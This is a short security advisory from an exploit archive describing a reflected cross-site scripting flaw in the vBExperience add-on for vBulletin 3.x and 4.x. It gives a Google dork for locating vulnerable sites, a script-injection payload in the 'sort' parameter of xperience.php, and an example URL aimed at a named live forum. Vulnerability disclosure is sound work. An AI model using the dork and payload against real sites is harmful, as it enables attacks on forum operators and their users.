vBulletin VBExperience Cross Site Scripting

vBulletin VBExperience Cross Site Scripting: Posted Jun 17, 2011; Authored by Mr.ThieF; The vBExperience add-on as shipped with vBulletin versions 3.x.x and 4.x.x suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | e45483003574c24072a4ea684eb504b8ab7dfaaaf34ed36b7ffdcec312891b79; Download | Favorite | View

vBulletin VBExperience Cross Site Scripting


++++++++++++++++++++++++++++++++++++++++
[~] Author : Mr.ThieF <~

[~] Contact : Mr.ThieF@yahoo.com <~

[~] DorK : inurl:xperience.php

[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=245023

[~] Version : 4.x.x - 3.x.x

[~] Exploit :

http://[site]/[path]/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script>

[~] Example : 

http://www.vbaddict.net/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script>

++++++++++++++++++++++++++++++++++++++++

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

vBulletin VBExperience Cross Site Scripting

vBulletin VBExperience Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

vBulletin VBExperience Cross Site Scripting

Share This

vBulletin VBExperience Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems